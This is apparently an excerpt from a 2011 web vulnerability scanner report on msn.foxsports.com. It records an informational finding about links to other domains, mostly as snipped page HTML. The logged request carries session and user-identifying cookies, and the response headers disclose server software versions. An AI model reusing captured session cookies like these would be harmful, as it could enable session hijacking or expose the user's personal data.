<a href='http://msn.foxsports.com/video?vid=11488b72-869b-4def-9ea2-d302aaaf2581&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=11488b72-869b-4def-9ea2-d302aaaf2581&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video?vid=1e97202c-76bd-4bc7-935c-5ad5ba9cae5a&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=1e97202c-76bd-4bc7-935c-5ad5ba9cae5a&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/other/page/fox-flash?vid=8dc5fe25-84b5-4135-980a-7636efe6330e&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=8dc5fe25-84b5-4135-980a-7636efe6330e&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video?vid=3aebb01e-8cbe-45fd-9ef9-9662874330aa&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=3aebb01e-8cbe-45fd-9ef9-9662874330aa&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<div id="http://static.foxsports.com/content/fscom/img/2010/09/21/foxsports_300x100_NFLSidelines_20100921191918_0_0.JPG">
   
       
                   <a href="http://foxsports.seenon.com/?v=fox-sports_nfl&amp;ecid=PRF-SM-510004&amp;PA=FOXNFLSideline_300X100"><img src="http://static.foxsports.com/content/fscom/img/2010/09/21/foxsports_300x100_NFLSidelines_20100921191918_0_0.JPG" alt="" border="0" />
...[SNIP]...
<div id="http://static.foxsports.com/content/fscom/img/2011/01/07/nfl_Playoffs_300x100_B_20110107192147867_0_0.JPG">
   
       
                   <a href="http://www.ticketsnow.com/NFL-Football-Tickets/NFL-Playoff-Tickets.html?partnerCode=foxnfl "><img src="http://static.foxsports.com/content/fscom/img/2011/01/07/nfl_Playoffs_300x100_B_20110107192147867_0_0.JPG" alt="" border="0" />
...[SNIP]...
<h3><a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<h3><a title="News Corp." href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<h3><a title="FOX" href="http://www.fox.com">FOX</a>
...[SNIP]...
<h3><a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<h3><a title="FX" href="http://www.fxnetworks.com">FX</a>
...[SNIP]...
<h3><a title="Speed TV" href="http://www.speedtv.com">Speed TV</a>
...[SNIP]...
<h3><a title="NCAAFuel TV" href="http://www.fuel.tv">Fuel TV</a>
...[SNIP]...
<li>
                       <a href="http://www.foxcareers.com" title="Jobs">Jobs</a></li>
                   <li>
                       <a href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1" title="Join Our Opinion Panel">Join Our Opinion Panel</a>
...[SNIP]...
<li>
                       <a href="http://www.fox.com" title="FOX.com">FOX.com</a>
...[SNIP]...
<li>
                       <a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<li>
                       <a href="http://www.newscorp.com" title="News Corp">News Corp.</a>
...[SNIP]...
<li class="last">
                       <a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170" title="MSN Privacy">MSN Privacy</a>
...[SNIP]...
<li><a target="_blank" href="http://g.msn.com/0TO_/enus" title="Legal">Legal</a>
...[SNIP]...
<li><a target="_blank" href="http://advertising.msn.com/home/home.asp" title="Advertise">Advertise</a>
...[SNIP]...
<li><a target="_blank" href="http://rss.msn.com/" title="RSS">RSS</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...

10.2. http://msn.foxsports.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?fb_xd_fragment HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://msn.foxsports.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Cookie: _chartbeat2=oxy92bi233plhtq3; NetInsightSessionID=1; _gig_mig=1; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pALERTED=TRUE; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pRME=; pExternalUser=; pLMD="2011-01-08 00:30:34"; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pENC_FNAME=Z1NVLTXWY1w=; pENC_LNAME=/wgeX1XilBI=; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; 
pUID=/k94ON71KoD/EYqOMDzIDg==; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; MUID=65AFF4B77A124856A6B4337A160FA285
Proxy-Connection: Keep-Alive
Host: msn.foxsports.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
Cache-Control: max-age=34
Date: Sat, 08 Jan 2011 01:36:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 290066


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>-->
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.msn.com/js/vp.js"></script>
...[SNIP]...
<li>
<a href="http://www.speed.com/" title="Speed" class="speed" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Speed'});" target="_blank">SPEED</a>
...[SNIP]...
<li>
<a href="http://www.scout.com/" title="Scout" class="scout" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Scout'});" target="_blank">SCOUT</a>
...[SNIP]...
<li>
<a href="http://www.foxdeportes.com/" title="Deportes" class="deportes" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Deportes'});" target="_blank">DEPORTES</a>
...[SNIP]...
<li>
<a href="http://www.whatifsports.com" title="What If" class="what-if" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - What If'});" target="_blank">WHAT IF</a>
...[SNIP]...
<li>
<a href="http://fsr-pr.clearchannel.com" title="FOX Sports Radio" class="radio" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Fox Sports Radio'});" target="_blank">RADIO</a>
...[SNIP]...
<li>
<a href="http://foxsports.seenon.com/?ecid=PRF-SM-500003&PA=FoxSportNav " title="Shop" class="shop" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Shop'});" target="_blank">SHOP</a>
...[SNIP]...
<li><a href="http://www.bing.com/search" id="wslink">Search the Web</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=foxsports-nfl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.baseballamerica.com" target="_blank" title="Baseball America">Baseball America</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_mlb" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nascar" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nba" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nhl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">

   
                                    <a href="http://foxsoccer.tv" title="FoxSoccer.tv">FoxSoccer.tv</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.golfweek.com" target="_blank" title="Golfweek">Golfweek</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
p-down-off">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="Odds/Results">Odds/Results</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="TVG">TVG</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.racereplays.com/foxsports/index.cfm?start=ws_foxsports.com_navbar" target="_blank" title="Race Replays">Race Replays</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Race Series">Air Race Series</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Anaheim ">Anaheim </a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Los Angeles">Los Angeles</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouth.com/" target="_blank" title="Atlanta">Atlanta</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Memphis">Memphis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.nesn.com/" target="_blank" title="Boston">Boston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Miami">Miami</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Charlotte">Charlotte</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Milwaukee">Milwaukee</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cincinnati">Cincinnati</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsnorth.com/" target="_blank" title="Minneapolis">Minneapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cleveland">Cleveland</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Nashville">Nashville</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Columbus">Columbus</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Oklahoma City">Oklahoma City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Dallas">Dallas</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Orlando">Orlando</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsdetroit.com/" target="_blank" title="Detroit">Detroit</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsarizona.com/" target="_blank" title="Phoenix">Phoenix</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Green Bay">Green Bay</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Raleigh">Raleigh</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportshouston.com/" target="_blank" title="Houston">Houston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="San Antonio">San Antonio</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="Indianapolis">Indianapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="St. Louis">St. Louis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportskansascity.com/" target="_blank" title="Kansas City">Kansas City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Tampa">Tampa</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.yardbarker.com/rumors" target="_blank" title="Rumors">Rumors</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
<li class="">


                                                           <a href="http://foxsports.seenon.com/?ecid=PRF-SM-500012&amp;PA=FoxSportNav2" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="msn-logo"><a href="http://msn.com" class="out-link msn sprite" title="go to MSN.com"><span>
...[SNIP]...
<li>
               <a href="http://entertainment.msn.com/" class="out-link" title="Entertainment">Entertainment</a>
...[SNIP]...
<li class="first" title="eEntertainment"><a href="http://wonderwall.msn.com/" title="Celebrities">Celebrities</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://thebubble.msn.com/ " title="Comedy">Comedy</a></li>
<li class="" title="eEntertainment"><a href="http://entertainment.msn.com/news/?ipp=15" title="Entertainment News ">Entertainment News </a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://zone.msn.com/en-us/home" title="Games">Games</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/" title="Movies">Movies</a></li>
<li class="" title="eEntertainment"><a href="http://music.msn.com/" title="Music">Music</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/new-on-dvd/movies/" title="New on DVD">New on DVD</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://tv.msn.com/" title=" TV"> TV</a></li>
<li class="last" title="eEntertainment"><a href="http://entertainment.msn.com/video/?from=en-us_msnhp" title=" Video"> Video</a>
...[SNIP]...
<li>
   <a href="http://moneycentral.msn.com/home.asp" class="out-link" title="Money">Money</a>
...[SNIP]...
<li class="first" title="money"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="money"><a href="http://www.msnbc.msn.com/id/3032072/ns/business" title="Business News">Business News</a>
...[SNIP]...
<li class="" title="money"><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/investor/home.aspx" title="Investing">Investing</a></li>
<li class="" title="money"><a href="http://moneycentral.msn.com/personal-finance/" title="Personal Finance">Personal Finance</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="money"><a href="http://realestate.msn.com/" title="Real Estate &amp; Rentals">Real Estate & Rentals</a>
...[SNIP]...
<li class="last" title="money"><a href="http://articles.moneycentral.msn.com/video/default.aspx?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li>
   <a href="http://lifestyle.msn.com/default.aspx" class="out-link" title="Lifestyle">Lifestyle</a>
...[SNIP]...
<li class="first" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/" title="Beauty &amp; Fashion">Beauty & Fashion</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.delish.com/" title=" Cooking"> Cooking</a></li>
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/your-home/" title="Decor &amp; Organizing">Decor & Organizing</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://fitbie.msn.com" title="Fitbie">Fitbie</a></li>
<li class="" title="lifestyle"><a href="http://glo.msn.com/" title="Glo: For Her">Glo: For Her</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://health.msn.com/" title="Health">Health</a></li>
<li class="" title="lifestyle"><a href="http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/relationships/" title="Love &amp; Relationships">Love & Relationships</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269" title="Online Dating">Online Dating</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " title=" Travel"> Travel</a></li>
<li class="last" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/video/?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li id="msn-more">
   <a href="http://specials.msn.com/alphabet.aspx " class="msn-more" title="More">More</a>
...[SNIP]...
<li class="first" title="more"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="more"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" title="Maps &amp; Directions">Maps & Directions</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" title="Video">Video</a></li>
<li class="" title="more"><a href="http://careers.msn.com/" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="more"><a href="http://my.msn.com/" title="My MSN">My MSN</a></li>
<li class="" title="more"><a href="http://local.msn.com/weather.aspx" title="Weather">Weather</a></li>
<li class="" title="more"><a href="http://insidemsn.wordpress.com" title="Corrections &amp; Clarifications">Corrections & Clarifications</a>
...[SNIP]...
<li class="" title="more"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268" title="Personals">Personals</a></li>
<li class="" title="more"><a href="http://msn.whitepages.com/" title="White Pages">White Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.delish.com/" title="Delish">Delish</a></li>
<li class="" title="more"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="more"><a href="http://wonderwall.msn.com/" title="Wonderwall">Wonderwall</a>
...[SNIP]...
<li class="" title="more"><a href="http://games.msn.com/" title="Games Preview">Games Preview</a>
...[SNIP]...
<li class="" title="more"><a href="http://realestate.msn.com/" title="Real Estate/Rentals">Real Estate/Rentals</a>
...[SNIP]...
<li class="" title="more"><a href="http://yellowpages.msn.com/" title="Yellow Pages">Yellow Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://astrocenter.astrology.msn.com" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/shopping?FORM=SHOPH2" title="Shopping">Shopping</a></li>
<li class="" title="more"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" title="Feedback">Feedback</a></li>
<li class="" title="more"><a href="http://local.msn.com/news.aspx" title="Local Edition">Local Edition</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " title="Travel">Travel</a></li>
<li class="last" title="more"><a href="http://specials.msn.com/alphabet.aspx" title="Full MSN Index">Full MSN Index</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?FORM=FOXSP" class="bing-link">Bing</a>
...[SNIP]...
<h3><a href="http://www.foxsportsbracket.com/" title="VOTE: TOP MOMENT" >VOTE: TOP MOMENT</a>
...[SNIP]...
<span class="piped">|


<a href="http://www.foxsportswisconsin.com/01/07/11/NFL-bound/landing.html?blockID=387085&amp;feedID=5059" title="RB Clay, too">
RB Clay, too
</a>
...[SNIP]...
</span>
   

    <a href="http://www.foxsportswisconsin.com/01/07/11/NFL-bound/landing.html?blockID=387085&amp;feedID=5059" title="RB Clay, too"></a>
...[SNIP]...



    <a href="http://www.foxsportscarolinas.com/01/06/11/Carolinas-Outta-Luck/landing.html?blockID=386443&amp;feedID=3894" title="Turns out Panthers have no Luck at all">Turns out Panthers have no Luck at all</a>
...[SNIP]...



            <a href="http://www.foxsportscarolinas.com/01/06/11/Carolinas-Outta-Luck/landing.html?blockID=386443&amp;feedID=3894" title="Turns out Panthers have no Luck at all"></a>
...[SNIP]...
<div class="subhead Rumors"><a href="http://www.yardbarker.com"><img src="/component/photo/BroughtToYouByYardbarker">
...[SNIP]...
<h3><a title="Are Seahawks fans getting ripped off at the concession stand?" href="http://network.yardbarker.com/all_sports/article_external/is_the_seahawks_12th_man_getting_ripped_off/3926828">Are Seahawks fans getting ripped off at the concession stand?</a>
...[SNIP]...
<h3><a title="&#8216;Homeless Radio Voice Guy&#8217; story shows the best and worst of internet age journalism" href="http://network.yardbarker.com/mlb/article_external/homeless_radio_voice_guy_story_shows_us_the_best_and_worst_of_journalism_in_the_age_of_the_internet/3926527">&#8216;Homeless Radio Voice Guy&#8217; story shows the best and worst of internet age journalism</a>
...[SNIP]...
<h3><a title="Can Elway return Denver to the glory days?" href="http://network.yardbarker.com/nfl/article_external/can_john_elway_return_denver_to_their_days_of_glory/3926452">Can Elway return Denver to the glory days?</a>
...[SNIP]...
<div class="foot"><a title="MORE RUMORS" class="more" href="http://www.yardbarker.com/rumors">MORE RUMORS&nbsp;&raquo;</a>
...[SNIP]...
<td class="fs-promo-card-image" width="65">
                   <a href="http://www.whatifsports.com/x.asp?r=678106&u=gd"><img alt="Gridiron Dynasty" border="0" src="/component/photo/Gridiron_Dynasty_65x48" />
...[SNIP]...
<strong><a href="http://www.whatifsports.com/x.asp?r=678106&u=gd">Gridiron Dynasty</a>
...[SNIP]...
<div>
                           <a href="http://www.whatifsports.com/x.asp?r=678106&u=gd" target="_blank">PLAY NOW</a>
...[SNIP]...
<div class="body">
<a title="A year of turbulence in air travel" class="main-story" href="http://www.bing.com/travel/content/search?q=The+Middle+Seat%3a+A+Year+of+Turbulence+in+Air+Travel&cid=msn1174923&form=TRVCON&ocid=xnetr4-1"><img alt="A Transportation Security Administration officer pats down Elliott Erwitt as he works his way through security at San Francisco International Airport in San Francisco, c. Jeff Chiu - AP" border="0" height="90" width="90" src="http://blstb.msn.com/i/AD/F29127CDF33B4F7F0435CFFA510E7.jpg"><span class="copy">
...[SNIP]...
<li>
<a title="Elizabeth Edwards' will" href="http://specials.msn.com/A-List/Lifestyle/Nothing-for-John-Edwards.aspx?cp-documentid=27145166&ocid=xnetr4-2">Elizabeth Edwards' will</a>
...[SNIP]...
<li>
<a title="'Lost' numbers lucky in Mega Millions" href="http://www.bing.com/search?q=%22lost%22+numbers+mega+millions+lottery&form=msnhpm&ocid=xnetr4-3">'Lost' numbers lucky in Mega Millions</a>
...[SNIP]...
<li>
<a title="Video: Top 5 must-sees at CES" href="http://www.bing.com/videos/watch/video/top-5-at-ces/q9v2d33x?q=Consumer+Electronics+Show&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42007&ocid=xnetr4-4">Video: Top 5 must-sees at CES</a>
...[SNIP]...
<h4 class="story-data" title=" ">
                   
                       <a href="http://www.foxsportsarizona.com/01/06/11/Dont-forget-the-defenses/landing.html?blockID=386209&amp;feedID=4633" title="What about us?">
                           <img src="http://static.foxsports.com/content/fscom/img/2011/01/06/010611-CFB-Nick-Fairley-WHAT-ABOUT-US-JW-PI_20110106165621274_196_100.JPG" class="story-image" width="196" height="100" alt="
...[SNIP]...
</a>
                       <a href="http://www.foxsportsarizona.com/01/06/11/Dont-forget-the-defenses/landing.html?blockID=386209&amp;feedID=4633" title="What about us?">
                           <strong>
...[SNIP]...
</a>

                       <a href="http://www.foxsportsarizona.com/01/06/11/Dont-forget-the-defenses/landing.html?blockID=386209&amp;feedID=4633" class="story-blurb" title="What about us?">
                           Defensive studs like Auburn's Fairley will have a say in the
outcome of the BCS title game.

                       </a>
...[SNIP]...
<br />
                       <a class="story-link" href="http://www.foxsportsarizona.com/01/06/11/Dont-forget-the-defenses/landing.html?blockID=386209&amp;feedID=4633" title="FULL STORY">
                    FULL STORY&nbsp;&raquo;
                       </a>
...[SNIP]...
<h4 class="story-data" title=" ">
                   
